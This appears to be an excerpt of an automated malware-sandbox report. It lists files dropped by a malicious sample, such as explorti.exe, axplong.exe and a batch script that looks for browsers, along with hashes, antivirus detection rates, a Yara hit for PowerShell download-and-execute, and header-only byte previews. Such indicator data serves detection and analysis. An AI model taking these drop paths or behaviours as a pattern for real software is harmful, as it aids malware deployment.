                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\num[1].exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):192000
                                                                                        Entropy (8bit):6.396064528548989
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:c1VB1NFj5qD6o8KaxfE54HnnGiayl+beX8na5acUsRFrJKa:c171jj5q62aOanGiqbIzUGFdKa
                                                                                        MD5:CA10BC5DBF009B6DF405C2CCBDD22EFB
                                                                                        SHA1:D1C8F25DAC637BA857EC28A0FFCFAFA73E23A622
                                                                                        SHA-256:3C2245FB7F3D374D8685A573A6CAFBE79B5807F0F8CBD52F0CF4A203B785AB06
                                                                                        SHA-512:61D6EBA16EB34DCB230C15D11AAD0C8CE8C64B79A886C6ACFBF58DAC777F32521D2D9FFB9D645A6CC763BFC0AA9BBA403C469BA24EB814E3A009D0AB7F30DAF8
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\num[1].exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...P..f.....................B"......d............@..........................0$...........@....................................<.............................#.|$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):214528
                                                                                        Entropy (8bit):7.004479850578073
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:PLvfMR1x/WF2sMe/ZLahwlaMS3dpPEoPWZ3G0P7705YHDghMGwQ:PLvUR1x/uxWrpPh2jvGwQ
                                                                                        MD5:EAD5C20B175EBDDFC294F19D276D9F5A
                                                                                        SHA1:F74B6CECB5A68042DEE54DE356A2AB8CA9D7F622
                                                                                        SHA-256:7E559097F4E87C8E7D7850BF969E86FA556F090455318C79ABC23514201F99D4
                                                                                        SHA-512:2AD1A7460B4937CAE9702EF5C3C0195EBFEA3A352DBC6D978DA978120E546B5C1B63C12D0A0A3D16B2F960D168437F477431F7E51AD6E6A078920CDC37E09CCE
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 37%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v..y...y...y..f6...y...+...y...+...y...+...y....c..y...y...y...+...y...+...y...+...y..Rich.y..........................PE..L...F[.d.................0... ...............@....@..........................0$.....P.......................................,X..<....................................................................................@..\............................text...|/.......0.................. ..`.rdata... ...@..."...4..............@..@.data...h"...p.......V..............@....tohi................t..............@..@.diducow.............v..............@....rsrc....k ..........z..............@..@........................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):257872
                                                                                        Entropy (8bit):6.727482641240852
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):80880
                                                                                        Entropy (8bit):6.920480786566406
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\12a92bbd-643e-43cd-9af3-124d1fdc60ba.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:Google Chrome extension, version 3
                                                                                        Category:dropped
                                                                                        Size (bytes):135751
                                                                                        Entropy (8bit):7.804610863392373
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:h+OX7O5AeBWdSq2Zso2iDNjF3dNUPOTy61NVo8OJXhQXXUWFMOiiBIHWI7YyjM/8:pVdSj9hjVn6Oj5fOJR+k0iiW2IPMaIul
                                                                                        MD5:83EF25FBEE6866A64F09323BFE1536E0
                                                                                        SHA1:24E8BD033CD15E3CF4F4FF4C8123E1868544AC65
                                                                                        SHA-256:F421D74829F2923FD9E5A06153E4E42DB011824C33475E564B17091598996E6F
                                                                                        SHA-512:C699D1C9649977731EEA0CB4740C4BEAACEEC82AECC43F9F2B1E5625C487C0BC45FA08A1152A35EFBDB3DB73B8AF3625206315D1F9645A24E1969316F9F5B38C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........1...c@e.J.~..A...(9=...I.N.e..T......6.7..*.Kk?....]<.S(.....9}........$..6...:...9..b|B..8..I..7.8K\.KIn7.:.!^;.H........8.....,.\....b..uC...e?..E.U.........P..G..u!+......C.)Kw...............4..Qye..=$..Q.......?Oi.,O.RW6.k.+.&. .wu..tf....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. ..r.....p..~..3.1.vD.i.]...~...!...<..4KV.~y.).`........>E.NT.%1".%............o.....J._.H.B..w..C......UU.&C..fB&..|..i..J......I.??^.Z.....Y....0^......?...o.....O.~......W.....~.......R..z.Ma...u]..*..-.n....2s<....E..6.<..W.H.qh....:j.y...N.D.]Nj....../..a...{....g.....f).~._....1q..L..#.G...Q.w...J."

                                                                                        C:\Users\user\AppData\Local\Temp\2656.tmp\2657.tmp\2658.bat

                                                                                        Download File
                                                                                        Process:C:\Users\userCFHCBKKFIJ.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):2821
                                                                                        Entropy (8bit):4.949249124498804
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Nd27V5rN81fN80XUbaOUb5OzQ/iqzQ/hXDTjODAKpxVgXDOev0W:j6rrN81fN80Ebanb5OzQ/iqzQ/hTTj+y
                                                                                        MD5:DE9423D9C334BA3DBA7DC874AA7DBC28
                                                                                        SHA1:BF38B137B8D780B3D6D62AEE03C9D3F73770D638
                                                                                        SHA-256:A1E1B422C40FB611A50D3F8BF34F9819F76DDB304AA2D105FB49F41F57752698
                                                                                        SHA-512:63F13ACD904378AD7DE22053E1087D61A70341F1891ADA3B671223FEC8F841B42B6F1060A4B18C8BB865EE4CD071CADC7FF6BD6D549760945BF1645A1086F401
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:@shift /0..@echo off..setlocal....set "URL=https://www.youtube.com/account"....rem Initialize paths..set "chromePath="..set "edgePath="..set "firefoxPath="....rem Hardcoded paths..set "ProgramFiles64=C:\Program Files"..set "ProgramFiles86=C:\Program Files (x86)"....rem Check for Chrome in 64-bit system directory..if exist "%ProgramFiles64%\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%ProgramFiles64%\Google\Chrome\Application\chrome.exe".. goto check_edge..)....rem Check for Chrome in 32-bit system directory..if exist "%ProgramFiles86%\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%ProgramFiles86%\Google\Chrome\Application\chrome.exe".. goto check_edge..)....rem Check for Chrome in user profiles..for /d %%u in ("%SystemDrive%\Users\*") do (.. if exist "%%u\AppData\Local\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%%u\AppData\Local\Google\Chrome\Application\chrome.exe".. goto check_edge.. )..)....:check_edge....rem C

                                                                                        C:\Users\user\AppData\Local\Temp\514a7034-a1b0-4622-ba4d-c19fa8c64786.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:Google Chrome extension, version 3
                                                                                        Category:dropped
                                                                                        Size (bytes):11185
                                                                                        Entropy (8bit):7.951995436832936
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                        C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\RoamingCBGCBGCAFI.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1929728
                                                                                        Entropy (8bit):7.950023055229562
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:Hp1xNjgKwcs8ktH3FxhFb+9pzyqUnntttX0o:Jr+3csfVVxXbmp2q05X0o
                                                                                        MD5:927614BDB1FFF68B49468BC4A3886F36
                                                                                        SHA1:E684E796B2D93374C80E94D5B77FDD50C194A0D4
                                                                                        SHA-256:30B7B1795AF4FA8F43CDF9595F5A266DDFA407E9E3BAB55B0684618EFC6BBD0D
                                                                                        SHA-512:B8C84B98902D8B9B942D8B928A65E7F23465D773F9751F64695E011717AC84257D9D736781C7E9C239ED27B481F1C7FCA5A62A2EA3F255797F868E6D7A7829E7
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...*.^f.............................pL...........@...........................L.....>.....@.................................X...l............................WL.............................LWL..................................................... . ............................@....rsrc...............................@....idata ............................@... .P+.........................@...qhedmxhi.`....2..Z..................@...aflvgrfd.....`L......L..............@....taggant.0...pL.."...P..............@...........................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

                                                                                        Download File
                                                                                        Process:C:\Users\userGDHIIIIEHC.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1893888
                                                                                        Entropy (8bit):7.949794819876416
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:1di9oXLlhWykLaYpnirDNlaXhVlq0WxxdhBvFrupS:C9oXph7yhnkaR60WxBdcp
                                                                                        MD5:A0CED1B039766FBE1B0C2DA4F5BBAA5E
                                                                                        SHA1:FC8CD54E79FB23E550E29F6CF0DC0400D8550E15
                                                                                        SHA-256:9E582118BDC2B1BA04A4B393E8A0FC0E2E7156A615E0C411AEA24DE743C7996E
                                                                                        SHA-512:AC2F515E43DE5A5F659C26B1A4ED8F8E7B4090D3CDB9EA9195DDF8E8DA77F6D349DEADD87D6A4A049F0FD3FC4A2D63562D35FA788EE1C0CF09A5A34C936FEB74
                                                                                        Malicious:true
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................K...........@..........................0K...........@.................................X...l.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .p*.........................@...tvrujsnp..... 1.....................@...vpziaunm......J.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1658
                                                                                        Entropy (8bit):5.408829334284374
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0EtL5R6D0+A5M:JIVuwEw5MUFZLBQLtFNXM
                                                                                        MD5:901A25A9381F2F764BF32FB4744A3CC2
                                                                                        SHA1:A490F83011F91A3DB3C220F4F0A3DEA321F351C3
                                                                                        SHA-256:2EA1F18CDAF99C3E1E3454838957C7E0B4C3EB427A5202A8812D3871BC0F28EE
                                                                                        SHA-512:E4F96D4FBCB07A4008EE8A40A1B40D43DB4205C61B2FE4BBFAF9986F592A82EF17A3E34EA80485F67106FA5FE3F7139D3BF474DC0A1AC8398FC3E5DB55C8E517
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                        C:\Users\user\AppData\Local\Temp\d8c4827c-cb9c-4a1a-94c1-2a38eccb0026.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:L:L
                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.

                                                                                        C:\Users\user\AppData\Local\Temp\db3ddf81-7973-47aa-833c-f192bbde4a95.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:L:L
                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.

                                                                                        C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.4593089050301797
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                        MD5:D910AD167F0217587501FDCDB33CC544
                                                                                        SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                        SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                        SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\12a92bbd-643e-43cd-9af3-124d1fdc60ba.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:Google Chrome extension, version 3
                                                                                        Category:dropped
                                                                                        Size (bytes):135751
                                                                                        Entropy (8bit):7.804610863392373
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:h+OX7O5AeBWdSq2Zso2iDNjF3dNUPOTy61NVo8OJXhQXXUWFMOiiBIHWI7YyjM/8:pVdSj9hjVn6Oj5fOJR+k0iiW2IPMaIul
                                                                                        MD5:83EF25FBEE6866A64F09323BFE1536E0
                                                                                        SHA1:24E8BD033CD15E3CF4F4FF4C8123E1868544AC65
                                                                                        SHA-256:F421D74829F2923FD9E5A06153E4E42DB011824C33475E564B17091598996E6F
                                                                                        SHA-512:C699D1C9649977731EEA0CB4740C4BEAACEEC82AECC43F9F2B1E5625C487C0BC45FA08A1152A35EFBDB3DB73B8AF3625206315D1F9645A24E1969316F9F5B38C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........1...c@e.J.~..A...(9=...I.N.e..T......6.7..*.Kk?....]<.S(.....9}........$..6...:...9..b|B..8..I..7.8K\.KIn7.:.!^;.H........8.....,.\....b..uC...e?..E.U.........P..G..u!+......C.)Kw...............4..Qye..=$..Q.......?Oi.,O.RW6.k.+.&. .wu..tf....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. ..r.....p..~..3.1.vD.i.]...~...!...<..4KV.~y.).`........>E.NT.%1".%............o.....J._.H.B..w..C......UU.&C..fB&..|..i..J......I.??^.Z.....Y....0^......?...o.....O.~......W.....~.......R..z.Ma...u]..*..-.n....2s<....E..6.<..W.H.qh....:j.y...N.D.]Nj....../..a...{....g.....f).~._....1q..L..#.G...Q.w...J."

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\128.png

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):4982
                                                                                        Entropy (8bit):7.929761711048726
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\af\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):908
                                                                                        Entropy (8bit):4.512512697156616
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                        Malicious:false
                                                                                        Reputation:unknown
